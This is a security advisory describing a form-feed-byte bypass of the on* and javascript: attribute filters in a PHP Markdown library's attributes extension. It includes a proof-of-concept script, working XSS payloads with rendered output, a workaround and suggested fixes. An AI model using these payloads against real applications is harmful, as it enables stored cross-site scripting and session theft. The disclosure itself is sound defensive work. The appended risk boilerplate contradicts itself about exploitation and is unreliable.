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GHSA-f8fg-pg57-v4j8
Summary
The AttributesExtension documents a security guarantee:
Note: Attributes starting with
on(e.g.onclickoronerror) are capable of executing JavaScript code and are therefore never allowed by default. You must explicitly add them to theallowlist if you want to use them.—
docs/2.x/extensions/attributes.md
Prefixing the attribute name with a single U+000C FORM FEED byte defeats that guarantee.
{<FF>onclick="alert(1)"} passes through AttributesHelper::filterAttributes() untouched and is
written verbatim into the output, where browsers parse it as a genuine onclick handler.
The same prefix defeats the allow_unsafe_links check, letting a javascript: URI through on
href / src even when allow_unsafe_links is false.
This bypasses the fix shipped in the 2.7.0 security release ("Fix XSS in AttributesExtension",
43207253ea5f14867c77c697cd3838c446cadcea), which added filterAttributes() for the express
purpose of blocking these attributes.
Throughout this report <FF> denotes a literal U+000C byte ("\x0C" in PHP). It is invisible in
rendered text, so all payloads below are written with PHP escape sequences to stay unambiguous.
Details
Three behaviours combine.
1. \x0C survives the parser's trim().
AttributesHelper::SINGLE_ATTRIBUTE begins with \s*, and Cursor::match() returns
$matches[0][0] — the entire match, including that leading whitespace. The result is cleaned
with PHP's trim():
// src/Extension/Attributes/Util/AttributesHelper.php:62
while ($attribute = \trim((string) $attributeCursor->match('/^' . self::SINGLE_ATTRIBUTE . '/i'))) {
PCRE \s matches \x0C, but PHP's default trim() charlist is " \t\n\r\0\x0B" — it includes
the vertical tab \x0B but not the form feed \x0C. The byte is therefore consumed by the
regex, retained in the returned match, and not stripped. It ends up inside the attribute name:
// src/Extension/Attributes/Util/AttributesHelper.php:94
$attributes[\trim($name)] = \trim($value); // $name === "\x0Conclick"
\x0C is the only byte with this property: every other character the HTML5 tokenizer treats as
whitespace (\x09, \x0A, \x0D, \x20), plus \x0B, is in PHP's trim charlist. The PoC
includes a \x0B case as a control, and it is correctly stripped.
2. The filter's string comparisons miss it.
filterAttributes() compares the raw name against literal strings:
// src/Extension/Attributes/Util/AttributesHelper.php:148-166
$attrNameLower = \strtolower($name); // "\x0conclick"
... ($attrNameLower === 'href' || $attrNameLower === 'src') ... // false
... \str_starts_with($attrNameLower, 'on') ... // false -> not removed
3. The renderer never escapes attribute names.
// src/Util/HtmlElement.php:123-129
$result .= ' ' . $key . '="' . Xml::escape($value) . '"'; // $key emitted raw
Because the HTML5 tokenizer treats \x0C as whitespace between attributes, the browser reads
the name as plain onclick.
PoC
<?php
require 'vendor/autoload.php';
use League\CommonMark\Environment\Environment;
use League\CommonMark\Extension\Attributes\AttributesExtension;
use League\CommonMark\Extension\CommonMark\CommonMarkCoreExtension;
use League\CommonMark\MarkdownConverter;
// The most defensive configuration docs/2.x/security.md recommends.
$env = new Environment([
'html_input' => 'escape',
'allow_unsafe_links' => false,
'max_nesting_level' => 100,
// 'attributes' => ['allow' => [...]] deliberately left at its default []
]);
$env->addExtension(new CommonMarkCoreExtension());
$env->addExtension(new AttributesExtension());
$converter = new MarkdownConverter($env);
$FF = "\x0C";
echo $converter->convert('hello {onclick="alert(1)"}')->getContent();
// <p>hello</p> <- filtered, as documented
echo $converter->convert('hello {' . $FF . 'onclick="alert(1)"}')->getContent();
// <p \x0Conclick="alert(1)">hello</p> <- BYPASS
Full observed output (\x0C shown escaped; it is a literal single byte in the real output):
| # | Markdown input | Rendered output | Result |
|---|---|---|---|
| A | hello {onclick="alert(1)"} | <p>hello</p> | filtered (control) |
| B | hello {\x0Conclick="alert(1)"} | <p \x0Conclick="alert(1)">hello</p> | bypass |
| C | hello {\x0Bonclick="alert(1)"} | <p>hello</p> | filtered (control) |
| D | [click](javascript:alert(1)) | <p><a>click</a></p> | filtered (control) |
| E | [click](https://example.com){\x0Chref="javascript:alert(1)"} | <p><a \x0Chref="javascript:alert(1)" href="https://example.com">click</a></p> | bypass |
| F | {\x0Conerror="alert(1)"} | <p><img \x0Conerror="alert(1)" src="…" alt="x" /></p> | bypass |
| G | # heading + newline + {\x0Conclick="alert(1)"} | <h1 \x0Conclick="alert(1)">heading</h1> | bypass (block syntax) |
In case E the injected href precedes the legitimate one. Per the HTML5 duplicate-attribute rule
the first occurrence wins, so the javascript: URI is the one the browser actually uses.
Browser confirmation. Loading the library's unmodified output in Chrome for Testing 148:
<img> attribute names : ["onerror","src","alt"] <- parsed as a real `onerror`
typeof img.onerror : function <- bound as an event handler
handlers fired : ["img-onerror"] <- fired on load, no interaction
document.title : XSS-FIRED
link href attribute : "javascript:void(0)"
link href property : "javascript:void(0)" <- javascript: URI is the effective href
page errors : []
The onerror case executes with no user interaction — rendering the attacker's Markdown is
sufficient.
Verified against git HEAD (f966b17a) and against tag 2.9.0, on PHP 8.5.8.
Impact
Stored cross-site scripting in any application that renders untrusted Markdown with
AttributesExtension enabled and attributes.allow left at its default [] — even when the
application has followed every hardening step in docs/2.x/security.md
(html_input => 'escape', allow_unsafe_links => false, max_nesting_level => 100).
Consequences are the usual for stored XSS: session and cookie theft, actions performed as the
viewing user, and account takeover where the host application permits it. Because the payload can
be attached to an image (onerror), it fires on page load without requiring the victim to
interact with anything.
The affected configuration is the extension's default: attributes.allow defaults to [], and
the documentation describes that default as safe with respect to on* attributes.
Workaround for users
Setting an explicit allow list takes the other branch of filterAttributes(), which drops the
form-feed name because it is not in the list:
$config = ['attributes' => ['allow' => ['id', 'class', 'align']]];
Verified: hello {\x0Conclick="alert(1)"} then renders as <p>hello</p>.
Suggested fix
The narrow fix is to add \x0C to the trim charlist at AttributesHelper.php lines 62, 89, 90
and 94. That closes this instance but leaves the shape of the problem in place.
A more durable fix is to reject anything that is not a well-formed attribute name in
filterAttributes(), reusing the constant the parser already defines (RegexHelper is already
imported in that file):
foreach ($attributes as $name => $value) {
// Names are compared against literal strings below and emitted without escaping,
// so anything that isn't a plain attribute name must not get through.
if (\preg_match('/^' . RegexHelper::PARTIAL_ATTRIBUTENAME . '$/i', $name) !== 1) {
unset($attributes[$name]);
continue;
}
$attrNameLower = \strtolower($name);
// ... existing logic unchanged
}
As defence in depth, HtmlElement::__toString() could validate or escape $key. It currently
trusts its callers to supply safe attribute names, and filterAttributes() is the only thing
standing between that method and user-supplied input.
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The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The vulnerability can affect other systems as well, not just the initial system. There is a low impact on the confidentiality of the information. There is a low impact on the integrity of the data.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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